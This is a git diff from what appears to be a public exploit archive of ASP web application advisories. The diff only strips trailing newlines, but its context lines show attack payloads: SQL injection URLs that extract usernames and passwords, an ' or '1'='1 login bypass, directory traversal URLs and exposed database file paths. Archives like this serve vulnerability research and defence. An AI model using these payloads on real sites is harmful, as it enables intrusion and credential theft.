\ No newline at end of file diff --git a/platforms/asp/webapps/1071.pl b/platforms/asp/webapps/1071.pl index 0a8454fdf..ed1420d84 100755 --- a/platforms/asp/webapps/1071.pl +++ b/platforms/asp/webapps/1071.pl @@ -25,4 +25,4 @@ $page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password") || di $page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of password is: $1\n"; print "[-] Unable to retrieve hash of password\n" if(!$1); -# milw0rm.com [2005-06-27] +# milw0rm.com [2005-06-27] \ No newline at end of file diff --git a/platforms/asp/webapps/10713.txt b/platforms/asp/webapps/10713.txt index 5ad78da77..a1e16f0d1 100755 --- a/platforms/asp/webapps/10713.txt +++ b/platforms/asp/webapps/10713.txt @@ -71,5 +71,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng -########################################################################### - +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10767.txt b/platforms/asp/webapps/10767.txt index bad2332a1..d55dd904a 100755 --- a/platforms/asp/webapps/10767.txt +++ b/platforms/asp/webapps/10767.txt @@ -15,4 +15,4 @@ ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * -------------------------------------------------------------------------------------------- +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10770.txt b/platforms/asp/webapps/10770.txt index a26667f4b..e09090e0b 100755 --- a/platforms/asp/webapps/10770.txt +++ b/platforms/asp/webapps/10770.txt @@ -15,4 +15,4 @@ ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * Redda * Mourad (dgsn.dz) * -------------------------------------------------------------------------------------------- +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10771.txt b/platforms/asp/webapps/10771.txt index 7a5eb48e2..07349e49c 100755 --- a/platforms/asp/webapps/10771.txt +++ b/platforms/asp/webapps/10771.txt @@ -30,4 +30,4 @@ Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * Stake (v4-team) * Angel25dz (hackteatch.com) -------------------------------------------------------------------------------------------- +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10772.txt b/platforms/asp/webapps/10772.txt index 5c97e755d..cd93216e7 100755 --- a/platforms/asp/webapps/10772.txt +++ b/platforms/asp/webapps/10772.txt @@ -15,4 +15,4 @@ ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * -------------------------------------------------------------------------------------------- +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10773.txt b/platforms/asp/webapps/10773.txt index b508cd9ca..341862149 100755 --- a/platforms/asp/webapps/10773.txt +++ b/platforms/asp/webapps/10773.txt @@ -15,4 +15,4 @@ ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * -------------------------------------------------------------------------------------------- +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10774.txt b/platforms/asp/webapps/10774.txt index 462af1b50..f57381cd2 100755 --- a/platforms/asp/webapps/10774.txt +++ b/platforms/asp/webapps/10774.txt @@ -15,4 +15,4 @@ ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * -------------------------------------------------------------------------------------------- +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10775.txt b/platforms/asp/webapps/10775.txt index 25e3c284b..382811c14 100755 --- a/platforms/asp/webapps/10775.txt +++ b/platforms/asp/webapps/10775.txt @@ -15,4 +15,4 @@ ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * -------------------------------------------------------------------------------------------- +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10776.txt b/platforms/asp/webapps/10776.txt index 19c235991..c2a31a560 100755 --- a/platforms/asp/webapps/10776.txt +++ b/platforms/asp/webapps/10776.txt @@ -15,4 +15,4 @@ ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * -------------------------------------------------------------------------------------------- +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10777.txt b/platforms/asp/webapps/10777.txt index 1ac678538..d01979323 100755 --- a/platforms/asp/webapps/10777.txt +++ b/platforms/asp/webapps/10777.txt @@ -15,4 +15,4 @@ ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * -------------------------------------------------------------------------------------------- +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10778.txt b/platforms/asp/webapps/10778.txt index eef4a1927..6e2edae3d 100755 --- a/platforms/asp/webapps/10778.txt +++ b/platforms/asp/webapps/10778.txt @@ -15,4 +15,4 @@ ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * -------------------------------------------------------------------------------------------- +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10780.txt b/platforms/asp/webapps/10780.txt index f191a87ca..83883e93d 100755 --- a/platforms/asp/webapps/10780.txt +++ b/platforms/asp/webapps/10780.txt @@ -15,4 +15,4 @@ ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * -------------------------------------------------------------------------------------------- +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10794.txt b/platforms/asp/webapps/10794.txt index 397325f63..86a3ce075 100755 --- a/platforms/asp/webapps/10794.txt +++ b/platforms/asp/webapps/10794.txt @@ -21,4 +21,4 @@ good luck :D Thanks to : Allah .. -Greets : ! BaD BoY ! , Dr.php , Jetli007 , Gov.Hacker , AnTi SeCuRe , Dr.$audi , All Vxx9.Cc Members +Greets : ! BaD BoY ! , Dr.php , Jetli007 , Gov.Hacker , AnTi SeCuRe , Dr.$audi , All Vxx9.Cc Members \ No newline at end of file diff --git a/platforms/asp/webapps/10795.txt b/platforms/asp/webapps/10795.txt index fa800e6d1..6295daa33 100755 --- a/platforms/asp/webapps/10795.txt +++ b/platforms/asp/webapps/10795.txt @@ -17,4 +17,4 @@ good luck :D Thanks to : Allah .. -Greets : Jetli007 , ! BaD BoY ! , Dr.php , Gov.Hacker , AnTi SeCuRe , Dr.$audi , All Vxx9.Cc Members +Greets : Jetli007 , ! BaD BoY ! , Dr.php , Gov.Hacker , AnTi SeCuRe , Dr.$audi , All Vxx9.Cc Members \ No newline at end of file diff --git a/platforms/asp/webapps/10796.txt b/platforms/asp/webapps/10796.txt index 01dda9d94..86f9ecd8d 100755 --- a/platforms/asp/webapps/10796.txt +++ b/platforms/asp/webapps/10796.txt @@ -17,4 +17,4 @@ good luck :D Thanks to : Allah .. -Greets : Dr.php , ! BaD BoY ! , Jetli007 , Gov.Hacker , AnTi SeCuRe , Dr.$audi , All Vxx9.Cc Members +Greets : Dr.php , ! BaD BoY ! , Jetli007 , Gov.Hacker , AnTi SeCuRe , Dr.$audi , All Vxx9.Cc Members \ No newline at end of file diff --git a/platforms/asp/webapps/10823.txt b/platforms/asp/webapps/10823.txt index a921449e6..8946ce9a8 100755 --- a/platforms/asp/webapps/10823.txt +++ b/platforms/asp/webapps/10823.txt @@ -70,5 +70,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng -########################################################################### - +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10883.txt b/platforms/asp/webapps/10883.txt index e94c0227a..922264159 100755 --- a/platforms/asp/webapps/10883.txt +++ b/platforms/asp/webapps/10883.txt @@ -66,5 +66,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng - Turk'uz Varmi Otesi? -########################################################################### - +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10884.txt b/platforms/asp/webapps/10884.txt index a6c82be78..b0f05cd45 100755 --- a/platforms/asp/webapps/10884.txt +++ b/platforms/asp/webapps/10884.txt @@ -26,5 +26,4 @@ http://server/[path]/admin/ """"""""""""""""""""" -Gamoscu - Manas58 - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO - +Gamoscu - Manas58 - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO \ No newline at end of file diff --git a/platforms/asp/webapps/10903.txt b/platforms/asp/webapps/10903.txt index 28c08f9c9..b13fb1504 100755 --- a/platforms/asp/webapps/10903.txt +++ b/platforms/asp/webapps/10903.txt @@ -72,5 +72,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng -########################################################################### - +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10940.txt b/platforms/asp/webapps/10940.txt index 91faa85c8..e2fb586fa 100755 --- a/platforms/asp/webapps/10940.txt +++ b/platforms/asp/webapps/10940.txt @@ -70,5 +70,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng -########################################################################### - +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10972.txt b/platforms/asp/webapps/10972.txt index 4a3652bfa..bfca387a4 100755 --- a/platforms/asp/webapps/10972.txt +++ b/platforms/asp/webapps/10972.txt @@ -72,5 +72,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng -########################################################################### - +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/11005.txt b/platforms/asp/webapps/11005.txt index 6920518b9..a7567f485 100755 --- a/platforms/asp/webapps/11005.txt +++ b/platforms/asp/webapps/11005.txt @@ -70,5 +70,4 @@ Ar-ge.Org :Cyber_945,D3xer -########################################################################### - +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/11008.txt b/platforms/asp/webapps/11008.txt index bef170365..7b3b16932 100755 --- a/platforms/asp/webapps/11008.txt +++ b/platforms/asp/webapps/11008.txt @@ -33,4 +33,4 @@ www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.ne www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir www.mormoroth.net * www.securitywall.org * www.sec-code.com * --------------------------------------------------------------------------------------------------------- +-------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/11016.txt b/platforms/asp/webapps/11016.txt index a145f656d..23a6cbaf7 100755 --- a/platforms/asp/webapps/11016.txt +++ b/platforms/asp/webapps/11016.txt @@ -29,4 +29,4 @@ www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.ne www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir www.mormoroth.net * www.securitywall.org * www.sec-code.com * --------------------------------------------------------------------------------------------------------- +-------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/11018.txt b/platforms/asp/webapps/11018.txt index 96953769f..99e5d14f1 100755 --- a/platforms/asp/webapps/11018.txt +++ b/platforms/asp/webapps/11018.txt @@ -32,4 +32,4 @@ www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.ne www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir www.mormoroth.net * www.securitywall.org * www.sec-code.com * --------------------------------------------------------------------------------------------------------- +-------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/11098.txt b/platforms/asp/webapps/11098.txt index c9bac4749..e011dadd4 100755 --- a/platforms/asp/webapps/11098.txt +++ b/platforms/asp/webapps/11098.txt @@ -26,4 +26,4 @@ Author: ViRuSMaN <- -########################################################################### +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/1112.txt b/platforms/asp/webapps/1112.txt index 0e2bb353f..4c8c9969f 100755 --- a/platforms/asp/webapps/1112.txt +++ b/platforms/asp/webapps/1112.txt @@ -106,4 +106,4 @@ hostcustid: -# milw0rm.com [2005-07-18] +# milw0rm.com [2005-07-18] \ No newline at end of file diff --git a/platforms/asp/webapps/11212.txt b/platforms/asp/webapps/11212.txt index c7dc51b94..e3e08a512 100755 --- a/platforms/asp/webapps/11212.txt +++ b/platforms/asp/webapps/11212.txt @@ -9,4 +9,4 @@ ################################################################# # Vulnerability: # http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./.. -################################################################# +################################################################# \ No newline at end of file diff --git a/platforms/asp/webapps/11295.txt b/platforms/asp/webapps/11295.txt index 1e0d0f617..f9a09fe33 100755 --- a/platforms/asp/webapps/11295.txt +++ b/platforms/asp/webapps/11295.txt @@ -45,5 +45,4 @@ http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./.. ======================= Directory Traversal 2 ======================= -http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./.. - +http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./.. \ No newline at end of file diff --git a/platforms/asp/webapps/11310.txt b/platforms/asp/webapps/11310.txt index 15b9e56e5..f7bfbbd42 100755 --- a/platforms/asp/webapps/11310.txt +++ b/platforms/asp/webapps/11310.txt @@ -24,4 +24,4 @@ http://server/browseFile.asp?dir=./.. # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir & whh_iran@yahoo.com -################################################################### +################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/11348.txt b/platforms/asp/webapps/11348.txt index be1999125..bb1c12bc8 100755 --- a/platforms/asp/webapps/11348.txt +++ b/platforms/asp/webapps/11348.txt @@ -38,4 +38,4 @@ # # # # http://server/path/db/email_addresses.mdb # # # -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/11369.txt b/platforms/asp/webapps/11369.txt index 900c6e201..9ecf5480b 100755 --- a/platforms/asp/webapps/11369.txt +++ b/platforms/asp/webapps/11369.txt @@ -26,4 +26,4 @@ Content-Length: 55 email=a%27&password=a%27&imageField.x=29&imageField.y=0 # # -[e0f] +[e0f] \ No newline at end of file diff --git a/platforms/asp/webapps/11414.txt b/platforms/asp/webapps/11414.txt index 830d21347..d425450a3 100755 --- a/platforms/asp/webapps/11414.txt +++ b/platforms/asp/webapps/11414.txt @@ -47,4 +47,4 @@ The parameters of the InsertImage the iged_uploadid can upload image files, but Open an attacker to change the parameters iged_uploadid Arbitrary File upload it enables. -http://server/test.aspx?lang=&iged_uploadid=Open&LocalizationType=English&LocalizationFile=&InitialDirectory=../../&num=1&parentId=WebHtmlEditor +http://server/test.aspx?lang=&iged_uploadid=Open&LocalizationType=English&LocalizationFile=&InitialDirectory=../../&num=1&parentId=WebHtmlEditor \ No newline at end of file diff --git a/platforms/asp/webapps/11555.txt b/platforms/asp/webapps/11555.txt index 367ff9d6b..f1b9c4c40 100755 --- a/platforms/asp/webapps/11555.txt +++ b/platforms/asp/webapps/11555.txt @@ -34,5 +34,4 @@ HcJ-Mr.Mero-Laqi@hajdin-Sh3ko-EGY-MaF!4-Trackoda-Dr.Mozo-TNT_HACKER-Elkatrez-Dat ---> h4kz.com & t00ls.org -Note : La Elah Ella ALLAH .. Muhammad Rasool ALLAH.. - +Note : La Elah Ella ALLAH .. Muhammad Rasool ALLAH.. \ No newline at end of file diff --git a/platforms/asp/webapps/11611.txt b/platforms/asp/webapps/11611.txt index cef52d949..e65010833 100755 --- a/platforms/asp/webapps/11611.txt +++ b/platforms/asp/webapps/11611.txt @@ -29,4 +29,4 @@ www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.ne www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir www.mormoroth.net * www.securitywall.org * www.sec-code.com * --------------------------------------------------------------------------------------------------------- +-------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/11931.txt b/platforms/asp/webapps/11931.txt index fbf912ef2..3bcdf641c 100755 --- a/platforms/asp/webapps/11931.txt +++ b/platforms/asp/webapps/11931.txt @@ -27,5 +27,4 @@ all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/ www.securityreason.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net --------------------------------------------------------------------------------------------------------------- - +-------------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/12029.txt b/platforms/asp/webapps/12029.txt index 8ed523f81..1aa440a9d 100755 --- a/platforms/asp/webapps/12029.txt +++ b/platforms/asp/webapps/12029.txt @@ -37,5 +37,4 @@ Page: http://[SITE]/admin/SA_news_exec.asp newsSubj=[MSG_SUBJECT_HERE]&viewCust=Y&newsBody=%0D%0A%0D%0A%0D%0A%3Cdiv+style%3D%22direction%3A+ltr%3B%22%3E[MSG_BODY_HERE]%3C%2Fdiv%3E+&MyAction=add&idNews=&submit1=++%D7%94%D7%95%D7%A1%D7%A3+%D7%94%D7%95%D7%93%D7%A2%D7%94++ # # -[e0f] - +[e0f] \ No newline at end of file diff --git a/platforms/asp/webapps/12100.txt b/platforms/asp/webapps/12100.txt index c04480525..e4193eec0 100755 --- a/platforms/asp/webapps/12100.txt +++ b/platforms/asp/webapps/12100.txt @@ -18,6 +18,4 @@ http://site.ir/news.asp?id=-1+union+select+1,concat(username,0x3a,0x3a,password) # Discoverd By: Pouya Daneshmand # Website: http://Pouya.Securitylab.ir # Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com -################################################################### - - +################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/12197.txt b/platforms/asp/webapps/12197.txt index feb34535f..1e2394a19 100755 --- a/platforms/asp/webapps/12197.txt +++ b/platforms/asp/webapps/12197.txt @@ -21,5 +21,4 @@ all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/ www.securityreason.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net --------------------------------------------------------------------------------------------------------------- - +-------------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/12199.txt b/platforms/asp/webapps/12199.txt index 0f2c93cbc..826b91306 100755 --- a/platforms/asp/webapps/12199.txt +++ b/platforms/asp/webapps/12199.txt @@ -21,5 +21,4 @@ all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/ www.securityreason.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net --------------------------------------------------------------------------------------------------------------- - +-------------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/12424.txt b/platforms/asp/webapps/12424.txt index cbfadb2e1..c39bc4ca1 100755 --- a/platforms/asp/webapps/12424.txt +++ b/platforms/asp/webapps/12424.txt @@ -21,5 +21,4 @@ all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/ www.securityreason.com * www.sa-hacker.com * www.alkrsan.net * www.mormoroth.net * MR.SoOoFe * ThE g0bL!N ------------------------------------------------------------------------------------------------------------------------- - +------------------------------------------------------------------------------------------------------------------------ \ No newline at end of file diff --git a/platforms/asp/webapps/12464.txt b/platforms/asp/webapps/12464.txt index 1b17e48ef..7d4bcb27a 100755 --- a/platforms/asp/webapps/12464.txt +++ b/platforms/asp/webapps/12464.txt @@ -76,4 +76,4 @@ Errore di run-time di Microsoft VBScript (0x800A000D) Tipo non corrispondente: 'sectionID' - /include/api.asp, line 657 + /include/api.asp, line 657 \ No newline at end of file diff --git a/platforms/asp/webapps/12478.txt b/platforms/asp/webapps/12478.txt index b3b008a8c..f24323222 100755 --- a/platforms/asp/webapps/12478.txt +++ b/platforms/asp/webapps/12478.txt @@ -35,5 +35,4 @@ Author: LionTurk <- Dandirik Scriptler Kullanmayýn. -########################################################################### - +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/1252.htm b/platforms/asp/webapps/1252.htm index d53aac828..3a1893040 100755 --- a/platforms/asp/webapps/1252.htm +++ b/platforms/asp/webapps/1252.htm @@ -41,4 +41,4 @@ Enjoy -# milw0rm.com [2005-10-15] +# milw0rm.com [2005-10-15] \ No newline at end of file diff --git a/platforms/asp/webapps/12606.txt b/platforms/asp/webapps/12606.txt index 0e0dd281d..17dfaf501 100755 --- a/platforms/asp/webapps/12606.txt +++ b/platforms/asp/webapps/12606.txt @@ -59,5 +59,4 @@ Contacts: xlocux[-at-]gmail.com * * -*Locu* - +*Locu* \ No newline at end of file diff --git a/platforms/asp/webapps/12664.txt b/platforms/asp/webapps/12664.txt index a375c5603..8be6d692a 100755 --- a/platforms/asp/webapps/12664.txt +++ b/platforms/asp/webapps/12664.txt @@ -27,4 +27,4 @@ http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast( I tried and finally find bug at this CMS ( Renista ) but i dont wanna any damage for the company, just for fun and NOTIFICATION . Special thanks to llvllr_special ,shabgard.org,Emperor, and other Iranian Hecker ... -Contact me : www.hack.net@gmail.com +Contact me : www.hack.net@gmail.com \ No newline at end of file diff --git a/platforms/asp/webapps/12693.txt b/platforms/asp/webapps/12693.txt index e0edb7123..a43f17912 100755 --- a/platforms/asp/webapps/12693.txt +++ b/platforms/asp/webapps/12693.txt @@ -26,4 +26,4 @@ ** Greetz to : ALLAH ** All Members of http://www.DZ4All.cOm/Cc ** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n & -*********************************************************** +*********************************************************** \ No newline at end of file diff --git a/platforms/asp/webapps/12701.txt b/platforms/asp/webapps/12701.txt index d979d248f..40eaa962b 100755 --- a/platforms/asp/webapps/12701.txt +++ b/platforms/asp/webapps/12701.txt @@ -27,4 +27,4 @@ ** ** http://[site]/artists.asp?id=24%20union%20select%201,username,userpass,4,5,6,7,8,9,10,11,12,13%20from%20users ** -*********************************************************** +*********************************************************** \ No newline at end of file diff --git a/platforms/asp/webapps/13793.txt b/platforms/asp/webapps/13793.txt index c9fea41f6..bed4e2daa 100755 --- a/platforms/asp/webapps/13793.txt +++ b/platforms/asp/webapps/13793.txt @@ -50,4 +50,4 @@ DEMO URL :http://site.com/onlinenotebookmanager.asp?ItemID=[SQLi] ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -########################################################################################################################################################################################## +########################################################################################################################################################################################## \ No newline at end of file diff --git a/platforms/asp/webapps/13815.pl b/platforms/asp/webapps/13815.pl index de5aab9ce..874adf64d 100755 --- a/platforms/asp/webapps/13815.pl +++ b/platforms/asp/webapps/13815.pl @@ -595,4 +595,4 @@ sub quit print "\e[1;31mExiting...Bye-Bye!\e[0m\n"; exit(1); } -# ***************************************************************** # +# ***************************************************************** # \ No newline at end of file diff --git a/platforms/asp/webapps/13840.txt b/platforms/asp/webapps/13840.txt index 9b7f980cc..e2ef35810 100755 --- a/platforms/asp/webapps/13840.txt +++ b/platforms/asp/webapps/13840.txt @@ -50,4 +50,4 @@ Use the string a' or '1'='1 for Username and Password to gain access. # 0day n0 m0re # -# L0rd CrusAd3r # +# L0rd CrusAd3r # \ No newline at end of file diff --git a/platforms/asp/webapps/13841.txt b/platforms/asp/webapps/13841.txt index 9e622deeb..73716dfdc 100755 --- a/platforms/asp/webapps/13841.txt +++ b/platforms/asp/webapps/13841.txt @@ -61,4 +61,4 @@ Use the string a' or '1'='1 for Username and Password to gain access. -- With R3gards, -L0rd CrusAd3r +L0rd CrusAd3r \ No newline at end of file diff --git a/platforms/asp/webapps/13842.txt b/platforms/asp/webapps/13842.txt index 0b6eaf153..0c63bca6b 100755 --- a/platforms/asp/webapps/13842.txt +++ b/platforms/asp/webapps/13842.txt @@ -66,4 +66,4 @@ Use the string a' or '1'='1 for Username and Password to gain access. -- With R3gards, -L0rd CrusAd3r +L0rd CrusAd3r \ No newline at end of file diff --git a/platforms/asp/webapps/13843.txt b/platforms/asp/webapps/13843.txt index 244a21b85..f0a139cda 100755 --- a/platforms/asp/webapps/13843.txt +++ b/platforms/asp/webapps/13843.txt @@ -51,4 +51,4 @@ http://[site]/pages/contact_list_mail_form.asp?ContactID=[sqli] -- With R3gards, -L0rd CrusAd3r +L0rd CrusAd3r \ No newline at end of file diff --git a/platforms/asp/webapps/13846.txt b/platforms/asp/webapps/13846.txt index e3c6b09d9..c2a6b303e 100755 --- a/platforms/asp/webapps/13846.txt +++ b/platforms/asp/webapps/13846.txt @@ -53,4 +53,4 @@ http://[site]/content.asp?CatId=[sqli] -- With R3gards, -L0rd CrusAd3r +L0rd CrusAd3r \ No newline at end of file diff --git a/platforms/asp/webapps/13860.txt b/platforms/asp/webapps/13860.txt index 4c1b435f0..2557c9f46 100755 --- a/platforms/asp/webapps/13860.txt +++ b/platforms/asp/webapps/13860.txt @@ -56,4 +56,4 @@ http://server/index.asp?intDivisionID=[sqli] -- With R3gards, -L0rd CrusAd3r +L0rd CrusAd3r \ No newline at end of file diff --git a/platforms/asp/webapps/13861.txt b/platforms/asp/webapps/13861.txt index 82f797808..03780b954 100755 --- a/platforms/asp/webapps/13861.txt +++ b/platforms/asp/webapps/13861.txt @@ -51,4 +51,4 @@ DEMO URL:http://server/calendar.asp?dt=[sqli] -- With R3gards, -L0rd CrusAd3r +L0rd CrusAd3r \ No newline at end of file diff --git a/platforms/asp/webapps/13886.txt b/platforms/asp/webapps/13886.txt index 4f93de742..d405baeb7 100755 --- a/platforms/asp/webapps/13886.txt +++ b/platforms/asp/webapps/13886.txt @@ -45,4 +45,4 @@ IISWorks ASPKnowledgeBase kb.mdb Remote User Database Disclosure IISWorks ASPWebMail Webmail.mdb Remote User Database Disclosure - http://[target]/Webmail/Database/Webmail.mdb + http://[target]/Webmail/Database/Webmail.mdb \ No newline at end of file diff --git a/platforms/asp/webapps/1399.txt b/platforms/asp/webapps/1399.txt index bc9ef300e..0a3e25cc9 100755 --- a/platforms/asp/webapps/1399.txt +++ b/platforms/asp/webapps/1399.txt @@ -34,4 +34,4 @@ Proof of Concepts : -# milw0rm.com [2005-12-30] +# milw0rm.com [2005-12-30] \ No newline at end of file diff --git a/platforms/asp/webapps/13995.txt b/platforms/asp/webapps/13995.txt index db3646aca..14c7a632f 100755 --- a/platforms/asp/webapps/13995.txt +++ b/platforms/asp/webapps/13995.txt @@ -21,4 +21,4 @@ http://localhost/[path]/printdetail.asp?Id=661 and 1=2 ################################################################################################## _________________________________________________________________ Yeni Windows 7: Size en uygun bilgisayar? bulun. Daha fazla bilgi edinin. -http://windows.microsoft.com/shop +http://windows.microsoft.com/shop \ No newline at end of file diff --git a/platforms/asp/webapps/14149.txt b/platforms/asp/webapps/14149.txt 